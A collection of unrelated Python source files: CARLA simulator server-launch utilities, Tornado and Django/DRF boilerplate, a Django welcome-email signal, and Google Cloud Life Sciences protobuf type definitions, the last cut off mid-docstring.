    def _tf_value_op(self, t: TensorType) -> TensorType:
        # Same formula as _value, expressed as TF graph ops.
        t = tf.math.minimum(t, self.schedule_timesteps)
        return self.final_p + (self.initial_p - self.final_p) * (
            1.0 - (t / self.schedule_timesteps))**self.power
nilq/baby-python
python
from carla_utils import carla

import os
from os.path import join
import random
import signal
import subprocess
import time
import psutil, pynvml

from carla_utils.basic import YamlConfig, Data
from carla_utils.system import is_used


class Core(object):
    '''
        Wraps a CARLA client/world connection plus optional traffic manager.
        Inspired by https://github.com/carla-simulator/rllib-integration/blob/main/rllib_integration/carla_core.py
    '''

    def __init__(self, config: YamlConfig, map_name=None, settings=None, use_tm=True):
        """Connect to the server described by `config` and register self on it."""
        self.host, self.port = config.host, config.port
        self.timeout = config.get('timeout', 2.0)
        self.seed = config.get('seed', 0)
        self.mode = config.get('mode', None)

        self.connect_to_server()
        self.available_map_names = self.client.get_available_maps()

        # Explicit settings override those read from the live world.
        if settings != None:
            self.settings = settings
        self.load_map(map_name)
        if use_tm:
            self.add_trafficmanager()
        # Make this core reachable through the shared config object.
        config.set('core', self)

    def connect_to_server(self):
        """Connect to the client"""
        # Retry with a fixed backoff; server startup can be slow.
        num_iter = 10
        for i in range(num_iter):
            try:
                self.client = carla.Client(self.host, self.port)
                self.client.set_timeout(self.timeout)
                self.world = self.client.get_world()
                self.town_map = self.world.get_map()
                self.map_name = self.town_map.name
                self.settings = self.world.get_settings()
                print('[Core] connected to server {}:{}'.format(self.host, self.port))
                return
            except Exception as e:
                print('Waiting for server to be ready: {}, attempt {} of {}'.format(e, i + 1, num_iter))
                time.sleep(2)
        raise Exception("Cannot connect to server. Try increasing 'timeout' or 'retries_on_error' at the carla configuration")

    def load_map(self, map_name=None, weather=carla.WeatherParameters.ClearNoon):
        """Switch to `map_name` if it differs from the current map, then apply weather/settings."""
        ### map
        map_name = str(map_name)
        # Only reload when the requested map differs AND is actually available.
        flag1 = self.map_name not in map_name
        flag2 = True in [map_name in available_map_name for available_map_name in self.available_map_names]
        if flag1 and flag2:
            self.client.load_world(map_name)
            self.world = self.client.get_world()
            self.town_map = self.world.get_map()
            self.map_name = self.town_map.name
            print('[Core] load map: ', self.map_name)

        ### weather
        self.world.set_weather(weather)  ## ! TODO

        ### settings
        # Apply only when something actually changed, to avoid a needless tick.
        current_settings = self.world.get_settings()
        if self.settings.synchronous_mode != current_settings.synchronous_mode \
                or self.settings.no_rendering_mode != current_settings.no_rendering_mode \
                or self.settings.fixed_delta_seconds != current_settings.fixed_delta_seconds:
            self.world.apply_settings(self.settings)
            print('[Core] set settings: ', self.settings)
        return

    def add_trafficmanager(self):
        """Attach a traffic manager on the first free port at/above port+6000."""
        tm_port = self.port + 6000
        while is_used(tm_port):
            print("Traffic manager's port " + str(tm_port) + " is already being used. Checking the next one")
            tm_port += 1000
        traffic_manager = self.client.get_trafficmanager(tm_port)
        # set_random_device_seed only exists in newer CARLA versions.
        if hasattr(traffic_manager, 'set_random_device_seed'):
            traffic_manager.set_random_device_seed(self.seed)
        traffic_manager.set_synchronous_mode(self.settings.synchronous_mode)
        # traffic_manager.set_hybrid_physics_mode(True)  ## do not use this
        self.traffic_manager = traffic_manager
        self.tm_port = tm_port
        return

    def tick(self):
        """Advance the simulation one step (only meaningful in synchronous mode)."""
        if self.settings.synchronous_mode:
            return self.world.tick()

    def kill(self):
        """Kill the server process this core launched, if any."""
        if hasattr(self, 'server'):
            kill_server(self.server)
        return


# =============================================================================
# -- server ------------------------------------------------------------------
# =============================================================================


def launch_server(env_index, host='127.0.0.1', sleep_time=5.0, low_quality=True, no_display=True):
    """Spawn one CARLA server process; returns Data(host, port, process)."""
    port = 2000 + env_index *2
    # Random jitter reduces port races when several servers start together.
    time.sleep(random.uniform(0, 1))
    port = get_port(port)
    cmd = generate_server_cmd(port, env_index, low_quality=low_quality, no_display=no_display)
    print('running: ', cmd)
    # setsid puts the server in its own process group so the whole group
    # can be killed later.
    server_process = subprocess.Popen(cmd, shell=True, preexec_fn=os.setsid, stdout=open(os.devnull, 'w'), )
    time.sleep(sleep_time)
    server = Data(host=host, port=port, process=server_process)
    return server


def launch_servers(env_indices, sleep_time=20.0):
    """Spawn one server per index, then wait once for all of them to boot."""
    host = '127.0.0.1'
    servers = []
    for index in env_indices:
        server = launch_server(index, host, sleep_time=0.0)
        servers.append(server)
    time.sleep(sleep_time)
    return servers


def kill_server(server):
    """Kill a single launched server (process and its process group)."""
    server.process.send_signal(signal.SIGKILL)
    os.killpg(os.getpgid(server.process.pid), signal.SIGKILL)
    print('killed server {}:{}'.format(server.host, server.port))
    return


def kill_servers(servers):
    for server in servers:
        kill_server(server)
    return


def kill_all_servers():
    '''Kill all PIDs that start with Carla'''
    processes = [p for p in psutil.process_iter() if "carla" in p.name().lower()]
    for process in processes:
        os.kill(process.pid, signal.SIGKILL)


def generate_server_cmd(port, env_index=-1, low_quality=True, use_opengl=True, no_display=True):
    """Build the shell command to start CarlaUE4 on `port`.

    Requires the CARLAPATH environment variable.  GPUs are assigned
    round-robin by env_index when running headless.
    """
    assert port % 2 == 0
    if env_index == -1:
        env_index = 0
    pynvml.nvmlInit()
    gpu_index = env_index % pynvml.nvmlDeviceGetCount()

    cmd = join(os.environ['CARLAPATH'], 'CarlaUE4.sh')
    cmd += ' -carla-rpc-port=' + str(port)
    if low_quality:
        cmd += ' -quality-level=Low'
    if use_opengl:
        cmd += ' -opengl'
    if no_display:
        # cmd = 'DISPLAY= ' + cmd  ### deprecated
        cmd = 'SDL_VIDEODRIVER=offscreen SDL_HINT_CUDA_DEVICE={} '.format(str(gpu_index)) + cmd
    return cmd


def connect_to_server(host, port, timeout=2.0, map_name=None, **kwargs):
    """Function-style counterpart of Core: returns (client, world, town_map)."""
    client = carla.Client(host, port)
    client.set_timeout(timeout)
    available_map_names = client.get_available_maps()
    world = client.get_world()
    town_map = world.get_map()

    ### map
    map_name = str(map_name)
    flag1 = town_map.name not in map_name
    flag2 = True in [map_name in available_map_name for available_map_name in available_map_names]
    if flag1 and flag2:
        client.load_world(map_name)
        world = client.get_world()
        town_map = world.get_map()

    ### weather
    weather = kwargs.get('weather', carla.WeatherParameters.ClearNoon)
    world.set_weather(weather)

    ### settings
    current_settings = world.get_settings()
    settings = kwargs.get('settings', current_settings)
    if settings.synchronous_mode != current_settings.synchronous_mode \
            or settings.no_rendering_mode != current_settings.no_rendering_mode \
            or settings.fixed_delta_seconds != current_settings.fixed_delta_seconds:
        world.apply_settings(settings)
    settings = world.get_settings()
    print('connected to server {}:{}'.format(host, port))
    return client, world, town_map


def get_port(port):
    """Return the first port p >= port where both p and p+1 are free
    (CARLA occupies two consecutive ports)."""
    while is_used(port) or is_used(port+1):
        port += 1000
    return port


# =============================================================================
# -- setting ------------------------------------------------------------------
# =============================================================================


def default_settings(sync=False, render=True, dt=0.0):
    """Build a carla.WorldSettings from the given flags."""
    settings = carla.WorldSettings()
    settings.synchronous_mode = sync
    settings.no_rendering_mode = not render
    settings.fixed_delta_seconds = dt
    return settings


# =============================================================================
# -- tick ---------------------------------------------------------------------
# =============================================================================


# def tick_world(core: Core):
#     if core.settings.synchronous_mode:
#         return core.world.tick()
nilq/baby-python
python
"""
    File Name    :  apiview.py
    Description  :  Base request handler for the API views.
    Author       :  mxm
    Created on   :  2020/8/16
"""
import tornado.web
import tornado.ioloop
import tornado.httpserver
import tornado.options

from abc import ABC
from tornado.options import options, define
from tornado.web import RequestHandler


class BaseHandler(RequestHandler, ABC):
    """Common base class for the project's request handlers.

    Currently adds no behaviour; exists so shared hooks (auth, error
    handling, ...) can be added in one place later.
    """
    pass
nilq/baby-python
python
from rest_framework import serializers
from .models import UserInfo


# NOTE(review): the class name `json` shadows the stdlib module name; it is
# kept unchanged here because renaming would break existing importers.
class json(serializers.ModelSerializer):
    """Serializer exposing a user's name and book logo."""

    class Meta:
        model = UserInfo
        fields = ('UserName', 'UserBookLogo')
nilq/baby-python
python
from django.contrib.auth.models import AbstractUser
from django.core import mail
from django.db.models.signals import post_save
from django.dispatch import receiver


class User(AbstractUser):
    """Application user; inherits all fields and behavior from AbstractUser."""
    pass


@receiver(post_save, sender=User)
def send_success_email(sender, **kwargs):
    """Sends a welcome email after user creation."""
    # post_save also fires on updates — greet only freshly created accounts.
    if not kwargs['created']:
        return
    new_user = kwargs['instance']
    greeting = mail.EmailMessage(
        'Welcome to Wall App!',
        '%s, we\'re really happy you decided to join our website! Thanks!' % new_user.username,
        'welcome@wall-app.com',
        [new_user.email],
    )
    greeting.send()
nilq/baby-python
python
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import proto # type: ignore from google.protobuf import duration_pb2 # type: ignore from google.protobuf import timestamp_pb2 # type: ignore from google.rpc import code_pb2 # type: ignore __protobuf__ = proto.module( package='google.cloud.lifesciences.v2beta', manifest={ 'RunPipelineRequest', 'RunPipelineResponse', 'Pipeline', 'Action', 'Secret', 'Mount', 'Resources', 'VirtualMachine', 'ServiceAccount', 'Accelerator', 'Network', 'Disk', 'Volume', 'PersistentDisk', 'ExistingDisk', 'NFSMount', 'Metadata', 'Event', 'DelayedEvent', 'WorkerAssignedEvent', 'WorkerReleasedEvent', 'PullStartedEvent', 'PullStoppedEvent', 'ContainerStartedEvent', 'ContainerStoppedEvent', 'UnexpectedExitStatusEvent', 'ContainerKilledEvent', 'FailedEvent', }, ) class RunPipelineRequest(proto.Message): r"""The arguments to the ``RunPipeline`` method. The requesting user must have the ``iam.serviceAccounts.actAs`` permission for the Cloud Life Sciences service account or the request will fail. Attributes: parent (str): The project and location that this request should be executed against. pipeline (google.cloud.lifesciences_v2beta.types.Pipeline): Required. The description of the pipeline to run. labels (Sequence[google.cloud.lifesciences_v2beta.types.RunPipelineRequest.LabelsEntry]): User-defined labels to associate with the returned operation. 
These labels are not propagated to any Google Cloud Platform resources used by the operation, and can be modified at any time. To associate labels with resources created while executing the operation, see the appropriate resource message (for example, ``VirtualMachine``). pub_sub_topic (str): The name of an existing Pub/Sub topic. The server will publish messages to this topic whenever the status of the operation changes. The Life Sciences Service Agent account must have publisher permissions to the specified topic or notifications will not be sent. """ parent = proto.Field( proto.STRING, number=4, ) pipeline = proto.Field( proto.MESSAGE, number=1, message='Pipeline', ) labels = proto.MapField( proto.STRING, proto.STRING, number=2, ) pub_sub_topic = proto.Field( proto.STRING, number=3, ) class RunPipelineResponse(proto.Message): r"""The response to the RunPipeline method, returned in the operation's result field on success. """ class Pipeline(proto.Message): r"""Specifies a series of actions to execute, expressed as Docker containers. Attributes: actions (Sequence[google.cloud.lifesciences_v2beta.types.Action]): The list of actions to execute, in the order they are specified. resources (google.cloud.lifesciences_v2beta.types.Resources): The resources required for execution. environment (Sequence[google.cloud.lifesciences_v2beta.types.Pipeline.EnvironmentEntry]): The environment to pass into every action. Each action can also specify additional environment variables but cannot delete an entry from this map (though they can overwrite it with a different value). timeout (google.protobuf.duration_pb2.Duration): The maximum amount of time to give the pipeline to complete. This includes the time spent waiting for a worker to be allocated. If the pipeline fails to complete before the timeout, it will be cancelled and the error code will be set to DEADLINE_EXCEEDED. If unspecified, it will default to 7 days. 
""" actions = proto.RepeatedField( proto.MESSAGE, number=1, message='Action', ) resources = proto.Field( proto.MESSAGE, number=2, message='Resources', ) environment = proto.MapField( proto.STRING, proto.STRING, number=3, ) timeout = proto.Field( proto.MESSAGE, number=4, message=duration_pb2.Duration, ) class Action(proto.Message): r"""Specifies a single action that runs a Docker container. Attributes: container_name (str): An optional name for the container. The container hostname will be set to this name, making it useful for inter-container communication. The name must contain only upper and lowercase alphanumeric characters and hyphens and cannot start with a hyphen. image_uri (str): Required. The URI to pull the container image from. Note that all images referenced by actions in the pipeline are pulled before the first action runs. If multiple actions reference the same image, it is only pulled once, ensuring that the same image is used for all actions in a single pipeline. The image URI can be either a complete host and image specification (e.g., quay.io/biocontainers/samtools), a library and image name (e.g., google/cloud-sdk) or a bare image name ('bash') to pull from the default library. No schema is required in any of these cases. If the specified image is not public, the service account specified for the Virtual Machine must have access to pull the images from GCR, or appropriate credentials must be specified in the [google.cloud.lifesciences.v2beta.Action.credentials][google.cloud.lifesciences.v2beta.Action.credentials] field. commands (Sequence[str]): If specified, overrides the ``CMD`` specified in the container. If the container also has an ``ENTRYPOINT`` the values are used as entrypoint arguments. Otherwise, they are used as a command and arguments to run inside the container. entrypoint (str): If specified, overrides the ``ENTRYPOINT`` specified in the container. 
environment (Sequence[google.cloud.lifesciences_v2beta.types.Action.EnvironmentEntry]): The environment to pass into the container. This environment is merged with values specified in the [google.cloud.lifesciences.v2beta.Pipeline][google.cloud.lifesciences.v2beta.Pipeline] message, overwriting any duplicate values. In addition to the values passed here, a few other values are automatically injected into the environment. These cannot be hidden or overwritten. ``GOOGLE_PIPELINE_FAILED`` will be set to "1" if the pipeline failed because an action has exited with a non-zero status (and did not have the ``IGNORE_EXIT_STATUS`` flag set). This can be used to determine if additional debug or logging actions should execute. ``GOOGLE_LAST_EXIT_STATUS`` will be set to the exit status of the last non-background action that executed. This can be used by workflow engine authors to determine whether an individual action has succeeded or failed. pid_namespace (str): An optional identifier for a PID namespace to run the action inside. Multiple actions should use the same string to share a namespace. If unspecified, a separate isolated namespace is used. port_mappings (Sequence[google.cloud.lifesciences_v2beta.types.Action.PortMappingsEntry]): A map of containers to host port mappings for this container. If the container already specifies exposed ports, use the ``PUBLISH_EXPOSED_PORTS`` flag instead. The host port number must be less than 65536. If it is zero, an unused random port is assigned. To determine the resulting port number, consult the ``ContainerStartedEvent`` in the operation metadata. mounts (Sequence[google.cloud.lifesciences_v2beta.types.Mount]): A list of mounts to make available to the action. In addition to the values specified here, every action has a special virtual disk mounted under ``/google`` that contains log files and other operational components. .. 
raw:: html <ul> <li><code>/google/logs</code> All logs written during the pipeline execution.</li> <li><code>/google/logs/output</code> The combined standard output and standard error of all actions run as part of the pipeline execution.</li> <li><code>/google/logs/action/*/stdout</code> The complete contents of each individual action's standard output.</li> <li><code>/google/logs/action/*/stderr</code> The complete contents of each individual action's standard error output.</li> </ul> labels (Sequence[google.cloud.lifesciences_v2beta.types.Action.LabelsEntry]): Labels to associate with the action. This field is provided to assist workflow engine authors in identifying actions (for example, to indicate what sort of action they perform, such as localization or debugging). They are returned in the operation metadata, but are otherwise ignored. credentials (google.cloud.lifesciences_v2beta.types.Secret): If the specified image is hosted on a private registry other than Google Container Registry, the credentials required to pull the image must be specified here as an encrypted secret. The secret must decrypt to a JSON-encoded dictionary containing both ``username`` and ``password`` keys. timeout (google.protobuf.duration_pb2.Duration): The maximum amount of time to give the action to complete. If the action fails to complete before the timeout, it will be terminated and the exit status will be non-zero. The pipeline will continue or terminate based on the rules defined by the ``ALWAYS_RUN`` and ``IGNORE_EXIT_STATUS`` flags. ignore_exit_status (bool): Normally, a non-zero exit status causes the pipeline to fail. This flag allows execution of other actions to continue instead. run_in_background (bool): This flag allows an action to continue running in the background while executing subsequent actions. This is useful to provide services to other actions (or to provide debugging support tools like SSH servers). 
always_run (bool): By default, after an action fails, no further actions are run. This flag indicates that this action must be run even if the pipeline has already failed. This is useful for actions that copy output files off of the VM or for debugging. Note that no actions will be run if image prefetching fails. enable_fuse (bool): Enable access to the FUSE device for this action. Filesystems can then be mounted into disks shared with other actions. The other actions do not need the ``enable_fuse`` flag to access the mounted filesystem. This has the effect of causing the container to be executed with ``CAP_SYS_ADMIN`` and exposes ``/dev/fuse`` to the container, so use it only for containers you trust. publish_exposed_ports (bool): Exposes all ports specified by ``EXPOSE`` statements in the container. To discover the host side port numbers, consult the ``ACTION_STARTED`` event in the operation metadata. disable_image_prefetch (bool): All container images are typically downloaded before any actions are executed. This helps prevent typos in URIs or issues like lack of disk space from wasting large amounts of compute resources. If set, this flag prevents the worker from downloading the image until just before the action is executed. disable_standard_error_capture (bool): A small portion of the container's standard error stream is typically captured and returned inside the ``ContainerStoppedEvent``. Setting this flag disables this functionality. block_external_network (bool): Prevents the container from accessing the external network. 
""" container_name = proto.Field( proto.STRING, number=1, ) image_uri = proto.Field( proto.STRING, number=2, ) commands = proto.RepeatedField( proto.STRING, number=3, ) entrypoint = proto.Field( proto.STRING, number=4, ) environment = proto.MapField( proto.STRING, proto.STRING, number=5, ) pid_namespace = proto.Field( proto.STRING, number=6, ) port_mappings = proto.MapField( proto.INT32, proto.INT32, number=8, ) mounts = proto.RepeatedField( proto.MESSAGE, number=9, message='Mount', ) labels = proto.MapField( proto.STRING, proto.STRING, number=10, ) credentials = proto.Field( proto.MESSAGE, number=11, message='Secret', ) timeout = proto.Field( proto.MESSAGE, number=12, message=duration_pb2.Duration, ) ignore_exit_status = proto.Field( proto.BOOL, number=13, ) run_in_background = proto.Field( proto.BOOL, number=14, ) always_run = proto.Field( proto.BOOL, number=15, ) enable_fuse = proto.Field( proto.BOOL, number=16, ) publish_exposed_ports = proto.Field( proto.BOOL, number=17, ) disable_image_prefetch = proto.Field( proto.BOOL, number=18, ) disable_standard_error_capture = proto.Field( proto.BOOL, number=19, ) block_external_network = proto.Field( proto.BOOL, number=20, ) class Secret(proto.Message): r"""Holds encrypted information that is only decrypted and stored in RAM by the worker VM when running the pipeline. Attributes: key_name (str): The name of the Cloud KMS key that will be used to decrypt the secret value. The VM service account must have the required permissions and authentication scopes to invoke the ``decrypt`` method on the specified key. cipher_text (str): The value of the cipherText response from the ``encrypt`` method. This field is intentionally unaudited. """ key_name = proto.Field( proto.STRING, number=1, ) cipher_text = proto.Field( proto.STRING, number=2, ) class Mount(proto.Message): r"""Carries information about a particular disk mount inside a container. 
Attributes: disk (str): The name of the disk to mount, as specified in the resources section. path (str): The path to mount the disk inside the container. read_only (bool): If true, the disk is mounted read-only inside the container. """ disk = proto.Field( proto.STRING, number=1, ) path = proto.Field( proto.STRING, number=2, ) read_only = proto.Field( proto.BOOL, number=3, ) class Resources(proto.Message): r"""The system resources for the pipeline run. At least one zone or region must be specified or the pipeline run will fail. Attributes: regions (Sequence[str]): The list of regions allowed for VM allocation. If set, the ``zones`` field must not be set. zones (Sequence[str]): The list of zones allowed for VM allocation. If set, the ``regions`` field must not be set. virtual_machine (google.cloud.lifesciences_v2beta.types.VirtualMachine): The virtual machine specification. """ regions = proto.RepeatedField( proto.STRING, number=2, ) zones = proto.RepeatedField( proto.STRING, number=3, ) virtual_machine = proto.Field( proto.MESSAGE, number=4, message='VirtualMachine', ) class VirtualMachine(proto.Message): r"""Carries information about a Compute Engine VM resource. Attributes: machine_type (str): Required. The machine type of the virtual machine to create. Must be the short name of a standard machine type (such as "n1-standard-1") or a custom machine type (such as "custom-1-4096", where "1" indicates the number of vCPUs and "4096" indicates the memory in MB). See `Creating an instance with a custom machine type <https://cloud.google.com/compute/docs/instances/creating-instance-with-custom-machine-type#create>`__ for more specifications on creating a custom machine type. preemptible (bool): If true, allocate a preemptible VM. labels (Sequence[google.cloud.lifesciences_v2beta.types.VirtualMachine.LabelsEntry]): Optional set of labels to apply to the VM and any attached disk resources. 
These labels must adhere to the `name and value restrictions <https://cloud.google.com/compute/docs/labeling-resources>`__ on VM labels imposed by Compute Engine. Labels keys with the prefix 'google-' are reserved for use by Google. Labels applied at creation time to the VM. Applied on a best-effort basis to attached disk resources shortly after VM creation. disks (Sequence[google.cloud.lifesciences_v2beta.types.Disk]): The list of disks to create and attach to the VM. Specify either the ``volumes[]`` field or the ``disks[]`` field, but not both. network (google.cloud.lifesciences_v2beta.types.Network): The VM network configuration. accelerators (Sequence[google.cloud.lifesciences_v2beta.types.Accelerator]): The list of accelerators to attach to the VM. service_account (google.cloud.lifesciences_v2beta.types.ServiceAccount): The service account to install on the VM. This account does not need any permissions other than those required by the pipeline. boot_disk_size_gb (int): The size of the boot disk, in GB. The boot disk must be large enough to accommodate all of the Docker images from each action in the pipeline at the same time. If not specified, a small but reasonable default value is used. cpu_platform (str): The CPU platform to request. An instance based on a newer platform can be allocated, but never one with fewer capabilities. The value of this parameter must be a valid Compute Engine CPU platform name (such as "Intel Skylake"). This parameter is only useful for carefully optimized work loads where the CPU platform has a significant impact. For more information about the effect of this parameter, see https://cloud.google.com/compute/docs/instances/specify- min-cpu-platform. boot_image (str): The host operating system image to use. Currently, only Container-Optimized OS images can be used. The default value is ``projects/cos-cloud/global/images/family/cos-stable``, which selects the latest stable release of Container-Optimized OS. 
This option is provided to allow testing against the beta release of the operating system to ensure that the new version does not interact negatively with production pipelines. To test a pipeline against the beta release of Container-Optimized OS, use the value ``projects/cos-cloud/global/images/family/cos-beta``. nvidia_driver_version (str): The NVIDIA driver version to use when attaching an NVIDIA GPU accelerator. The version specified here must be compatible with the GPU libraries contained in the container being executed, and must be one of the drivers hosted in the ``nvidia-drivers-us-public`` bucket on Google Cloud Storage. enable_stackdriver_monitoring (bool): Whether Stackdriver monitoring should be enabled on the VM. docker_cache_images (Sequence[str]): The Compute Engine Disk Images to use as a Docker cache. The disks will be mounted into the Docker folder in a way that the images present in the cache will not need to be pulled. The digests of the cached images must match those of the tags used or the latest version will still be pulled. The root directory of the ext4 image must contain ``image`` and ``overlay2`` directories copied from the Docker directory of a VM where the desired Docker images have already been pulled. Any images pulled that are not cached will be stored on the first cache disk instead of the boot disk. Only a single image is supported. volumes (Sequence[google.cloud.lifesciences_v2beta.types.Volume]): The list of disks and other storage to create or attach to the VM. Specify either the ``volumes[]`` field or the ``disks[]`` field, but not both. 
""" machine_type = proto.Field( proto.STRING, number=1, ) preemptible = proto.Field( proto.BOOL, number=2, ) labels = proto.MapField( proto.STRING, proto.STRING, number=3, ) disks = proto.RepeatedField( proto.MESSAGE, number=4, message='Disk', ) network = proto.Field( proto.MESSAGE, number=5, message='Network', ) accelerators = proto.RepeatedField( proto.MESSAGE, number=6, message='Accelerator', ) service_account = proto.Field( proto.MESSAGE, number=7, message='ServiceAccount', ) boot_disk_size_gb = proto.Field( proto.INT32, number=8, ) cpu_platform = proto.Field( proto.STRING, number=9, ) boot_image = proto.Field( proto.STRING, number=10, ) nvidia_driver_version = proto.Field( proto.STRING, number=11, ) enable_stackdriver_monitoring = proto.Field( proto.BOOL, number=12, ) docker_cache_images = proto.RepeatedField( proto.STRING, number=13, ) volumes = proto.RepeatedField( proto.MESSAGE, number=14, message='Volume', ) class ServiceAccount(proto.Message): r"""Carries information about a Google Cloud service account. Attributes: email (str): Email address of the service account. If not specified, the default Compute Engine service account for the project will be used. scopes (Sequence[str]): List of scopes to be enabled for this service account on the VM, in addition to the cloud- platform API scope that will be added by default. """ email = proto.Field( proto.STRING, number=1, ) scopes = proto.RepeatedField( proto.STRING, number=2, ) class Accelerator(proto.Message): r"""Carries information about an accelerator that can be attached to a VM. Attributes: type_ (str): The accelerator type string (for example, "nvidia-tesla-k80"). Only NVIDIA GPU accelerators are currently supported. If an NVIDIA GPU is attached, the required runtime libraries will be made available to all containers under ``/usr/local/nvidia``. The driver version to install must be specified using the NVIDIA driver version parameter on the virtual machine specification. 
Note that attaching a GPU increases the worker VM startup time by a few minutes. count (int): How many accelerators of this type to attach. """ type_ = proto.Field( proto.STRING, number=1, ) count = proto.Field( proto.INT64, number=2, ) class Network(proto.Message): r"""VM networking options. Attributes: network (str): The network name to attach the VM's network interface to. The value will be prefixed with ``global/networks/`` unless it contains a ``/``, in which case it is assumed to be a fully specified network resource URL. If unspecified, the global default network is used. use_private_address (bool): If set to true, do not attach a public IP address to the VM. Note that without a public IP address, additional configuration is required to allow the VM to access Google services. See https://cloud.google.com/vpc/docs/configure- private-google-access for more information. subnetwork (str): If the specified network is configured for custom subnet creation, the name of the subnetwork to attach the instance to must be specified here. The value is prefixed with ``regions/*/subnetworks/`` unless it contains a ``/``, in which case it is assumed to be a fully specified subnetwork resource URL. If the ``*`` character appears in the value, it is replaced with the region that the virtual machine has been allocated in. """ network = proto.Field( proto.STRING, number=1, ) use_private_address = proto.Field( proto.BOOL, number=2, ) subnetwork = proto.Field( proto.STRING, number=3, ) class Disk(proto.Message): r"""Carries information about a disk that can be attached to a VM. See https://cloud.google.com/compute/docs/disks/performance for more information about disk type, size, and performance considerations. Specify either [``Volume``][google.cloud.lifesciences.v2beta.Volume] or [``Disk``][google.cloud.lifesciences.v2beta.Disk], but not both. Attributes: name (str): A user-supplied name for the disk. Used when mounting the disk into actions. 
The name must contain only upper and lowercase alphanumeric characters and hyphens and cannot start with a hyphen. size_gb (int): The size, in GB, of the disk to attach. If the size is not specified, a default is chosen to ensure reasonable I/O performance. If the disk type is specified as ``local-ssd``, multiple local drives are automatically combined to provide the requested size. Note, however, that each physical SSD is 375GB in size, and no more than 8 drives can be attached to a single instance. type_ (str): The Compute Engine disk type. If unspecified, ``pd-standard`` is used. source_image (str): An optional image to put on the disk before attaching it to the VM. """ name = proto.Field( proto.STRING, number=1, ) size_gb = proto.Field( proto.INT32, number=2, ) type_ = proto.Field( proto.STRING, number=3, ) source_image = proto.Field( proto.STRING, number=4, ) class Volume(proto.Message): r"""Carries information about storage that can be attached to a VM. Specify either [``Volume``][google.cloud.lifesciences.v2beta.Volume] or [``Disk``][google.cloud.lifesciences.v2beta.Disk], but not both. Attributes: volume (str): A user-supplied name for the volume. Used when mounting the volume into [``Actions``][google.cloud.lifesciences.v2beta.Action]. The name must contain only upper and lowercase alphanumeric characters and hyphens and cannot start with a hyphen. persistent_disk (google.cloud.lifesciences_v2beta.types.PersistentDisk): Configuration for a persistent disk. existing_disk (google.cloud.lifesciences_v2beta.types.ExistingDisk): Configuration for a existing disk. nfs_mount (google.cloud.lifesciences_v2beta.types.NFSMount): Configuration for an NFS mount. 
""" volume = proto.Field( proto.STRING, number=1, ) persistent_disk = proto.Field( proto.MESSAGE, number=2, oneof='storage', message='PersistentDisk', ) existing_disk = proto.Field( proto.MESSAGE, number=3, oneof='storage', message='ExistingDisk', ) nfs_mount = proto.Field( proto.MESSAGE, number=4, oneof='storage', message='NFSMount', ) class PersistentDisk(proto.Message): r"""Configuration for a persistent disk to be attached to the VM. See https://cloud.google.com/compute/docs/disks/performance for more information about disk type, size, and performance considerations. Attributes: size_gb (int): The size, in GB, of the disk to attach. If the size is not specified, a default is chosen to ensure reasonable I/O performance. If the disk type is specified as ``local-ssd``, multiple local drives are automatically combined to provide the requested size. Note, however, that each physical SSD is 375GB in size, and no more than 8 drives can be attached to a single instance. type_ (str): The Compute Engine disk type. If unspecified, ``pd-standard`` is used. source_image (str): An image to put on the disk before attaching it to the VM. """ size_gb = proto.Field( proto.INT32, number=1, ) type_ = proto.Field( proto.STRING, number=2, ) source_image = proto.Field( proto.STRING, number=3, ) class ExistingDisk(proto.Message): r"""Configuration for an existing disk to be attached to the VM. Attributes: disk (str): If ``disk`` contains slashes, the Cloud Life Sciences API assumes that it is a complete URL for the disk. If ``disk`` does not contain slashes, the Cloud Life Sciences API assumes that the disk is a zonal disk and a URL will be generated of the form ``zones/<zone>/disks/<disk>``, where ``<zone>`` is the zone in which the instance is allocated. The disk must be ext4 formatted. If all ``Mount`` references to this disk have the ``read_only`` flag set to true, the disk will be attached in ``read-only`` mode and can be shared with other instances. 
Otherwise, the disk will be available for writing but cannot be shared. """ disk = proto.Field( proto.STRING, number=1, ) class NFSMount(proto.Message): r"""Configuration for an ``NFSMount`` to be attached to the VM. Attributes: target (str): A target NFS mount. The target must be specified as \`address:/mount". """ target = proto.Field( proto.STRING, number=1, ) class Metadata(proto.Message): r"""Carries information about the pipeline execution that is returned in the long running operation's metadata field. Attributes: pipeline (google.cloud.lifesciences_v2beta.types.Pipeline): The pipeline this operation represents. labels (Sequence[google.cloud.lifesciences_v2beta.types.Metadata.LabelsEntry]): The user-defined labels associated with this operation. events (Sequence[google.cloud.lifesciences_v2beta.types.Event]): The list of events that have happened so far during the execution of this operation. create_time (google.protobuf.timestamp_pb2.Timestamp): The time at which the operation was created by the API. start_time (google.protobuf.timestamp_pb2.Timestamp): The first time at which resources were allocated to execute the pipeline. end_time (google.protobuf.timestamp_pb2.Timestamp): The time at which execution was completed and resources were cleaned up. pub_sub_topic (str): The name of the Cloud Pub/Sub topic where notifications of operation status changes are sent. 
""" pipeline = proto.Field( proto.MESSAGE, number=1, message='Pipeline', ) labels = proto.MapField( proto.STRING, proto.STRING, number=2, ) events = proto.RepeatedField( proto.MESSAGE, number=3, message='Event', ) create_time = proto.Field( proto.MESSAGE, number=4, message=timestamp_pb2.Timestamp, ) start_time = proto.Field( proto.MESSAGE, number=5, message=timestamp_pb2.Timestamp, ) end_time = proto.Field( proto.MESSAGE, number=6, message=timestamp_pb2.Timestamp, ) pub_sub_topic = proto.Field( proto.STRING, number=7, ) class Event(proto.Message): r"""Carries information about events that occur during pipeline execution. Attributes: timestamp (google.protobuf.timestamp_pb2.Timestamp): The time at which the event occurred. description (str): A human-readable description of the event. Note that these strings can change at any time without notice. Any application logic must use the information in the ``details`` field. delayed (google.cloud.lifesciences_v2beta.types.DelayedEvent): See [google.cloud.lifesciences.v2beta.DelayedEvent][google.cloud.lifesciences.v2beta.DelayedEvent]. worker_assigned (google.cloud.lifesciences_v2beta.types.WorkerAssignedEvent): See [google.cloud.lifesciences.v2beta.WorkerAssignedEvent][google.cloud.lifesciences.v2beta.WorkerAssignedEvent]. worker_released (google.cloud.lifesciences_v2beta.types.WorkerReleasedEvent): See [google.cloud.lifesciences.v2beta.WorkerReleasedEvent][google.cloud.lifesciences.v2beta.WorkerReleasedEvent]. pull_started (google.cloud.lifesciences_v2beta.types.PullStartedEvent): See 